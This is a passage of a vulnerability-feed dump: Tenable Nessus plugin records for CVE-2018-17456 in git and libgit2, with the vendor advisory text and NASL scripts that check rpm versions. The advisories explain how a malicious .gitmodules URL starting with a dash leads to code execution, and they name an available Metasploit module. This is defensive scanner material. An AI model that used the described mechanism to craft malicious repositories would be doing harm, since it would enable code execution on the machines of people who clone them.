/ etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T06:15:17", "description": "This update for libgit2 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-17456: Submodule URLs and paths with a leading '-' are now\nignored to avoid injecting options into library consumers that perform\nrecursive clones (bsc#1110949).\n\nNon-security issues fixed: Version update to version 0.26.8\n(bsc#1114729).\n\nFull changelog can be found at :\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.8\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.7\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:4009-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:libgit2-debugsource", "p-cpe:/a:novell:suse_linux:libgit2-devel", "p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo", "p-cpe:/a:novell:suse_linux:libgit2"], "id": "SUSE_SU-2018-4009-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:4009-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120182);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : libgit2 (SUSE-SU-2018:4009-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libgit2 fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2018-17456: Submodule URLs and paths with a leading '-' are now\nignored to avoid injecting options into library consumers that perform\nrecursive clones (bsc#1110949).\n\nNon-security issues fixed: Version update to version 0.26.8\n(bsc#1114729).\n\nFull changelog can be found at :\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.8\n\n - https://github.com/libgit2/libgit2/releases/tag/v0.26.7\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1110949\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1114729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.26.7\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/libgit2/libgit2/releases/tag/v0.26.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-17456/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20184009-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?027f6a9d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-2865=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-26-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgit2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"libgit2-devel-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-26-debuginfo-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-debugsource-0.26.8-3.8.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"0\", reference:\"libgit2-devel-0.26.8-3.8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libgit2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-15T20:43:16", "description": "Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-27T00:00:00", "title": "Scientific Linux Security Update : git on SL7.x x86_64 (20181031)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:git-gnome-keyring", "p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN", "p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git-p4", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:git-bzr", "p-cpe:/a:fermilab:scientific_linux:git-hg", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git", "p-cpe:/a:fermilab:scientific_linux:git-instaweb", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:emacs-git", "p-cpe:/a:fermilab:scientific_linux:git-cvs"], "id": "SL_20181031_GIT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/119206", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119206);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-17456\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL7.x x86_64 (20181031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1811&L=scientific-linux-errata&F=&S=&P=2771\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?14c744ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gnome-keyring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-instaweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"emacs-git-el-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-all-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-bzr-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-cvs-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-email-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-gnome-keyring-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-gui-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-hg-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-instaweb-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"git-p4-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitk-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"gitweb-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-1.8.3.1-20.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"perl-Git-SVN-1.8.3.1-20.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:15:47", "description": "Upstream security update resolving an issue with `git clone\n--recurse-submodules`.\n\nFrom the [upstream release\nannouncement](https://public-inbox.org/git/xmqqy3bcuy3l.fsf@gitster-ct\n.c.googlers.com/) :\n\n> These releases fix a security flaw (CVE-2018-17456), which allowed\nan > attacker to execute arbitrary code by crafting a malicious\n.gitmodules > file in a project cloned with --recurse-submodules. > >\nWhen running 'git clone --recurse-submodules', Git parses the supplied\n> .gitmodules file for a URL field and blindly passes it as an\nargument > to a 'git clone' subprocess. If the URL field is set to a\nstring that > begins with a dash, this 'git clone' subprocess\ninterprets the URL as > an option. This can lead to executing an\narbitrary script shipped in > the superproject as the user who ran\n'git clone'. > > In addition to fixing the security issue for the user\nrunning 'clone', > the 2.17.2, 2.18.1 and 2.19.1 releases have an\n'fsck' check which can > be used to detect such malicious repository\ncontent when fetching or > accepting a push. See\n'transfer.fsckObjects' in git-config(1). > > Credit for finding and\nfixing this vulnerability goes to joernchen > and Jeff King,\nrespectively.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 29 : git (2018-06090dff59)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:git"], "id": "FEDORA_2018-06090DFF59.NASL", "href": "https://www.tenable.com/plugins/nessus/120213", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-06090dff59.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120213);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"FEDORA\", value:\"2018-06090dff59\");\n\n script_name(english:\"Fedora 29 : git (2018-06090dff59)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream security update resolving an issue with `git clone\n--recurse-submodules`.\n\nFrom the [upstream release\nannouncement](https://public-inbox.org/git/xmqqy3bcuy3l.fsf@gitster-ct\n.c.googlers.com/) :\n\n> These releases fix a security flaw (CVE-2018-17456), which allowed\nan > attacker to execute arbitrary code by crafting a malicious\n.gitmodules > file in a project cloned with --recurse-submodules. > >\nWhen running 'git clone --recurse-submodules', Git parses the supplied\n> .gitmodules file for a URL field and blindly passes it as an\nargument > to a 'git clone' subprocess. If the URL field is set to a\nstring that > begins with a dash, this 'git clone' subprocess\ninterprets the URL as > an option. This can lead to executing an\narbitrary script shipped in > the superproject as the user who ran\n'git clone'. > > In addition to fixing the security issue for the user\nrunning 'clone', > the 2.17.2, 2.18.1 and 2.19.1 releases have an\n'fsck' check which can > be used to detect such malicious repository\ncontent when fetching or > accepting a push. See\n'transfer.fsckObjects' in git-config(1). > > Credit for finding and\nfixing this vulnerability goes to joernchen > and Jeff King,\nrespectively.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-06090dff59\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"git-2.19.1-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T05:56:00", "description": "An update for git is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-02-04T00:00:00", "title": "RHEL 6 : git (RHSA-2020:0316)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2020-02-04T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:gitweb", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-email", "cpe:/o:redhat:enterprise_linux:6::client", "cpe:/o:redhat:enterprise_linux:6::workstation", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:emacs-git", "cpe:/o:redhat:enterprise_linux:6::computenode", "cpe:/o:redhat:enterprise_linux:6::server"], "id": "REDHAT-RHSA-2020-0316.NASL", "href": "https://www.tenable.com/plugins/nessus/133445", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0316. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133445);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/19\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_bugtraq_id(105523, 107511);\n script_xref(name:\"RHSA\", value:\"2020:0316\");\n\n script_name(english:\"RHEL 6 : git (RHSA-2020:0316)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for git is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/77.html\");\n 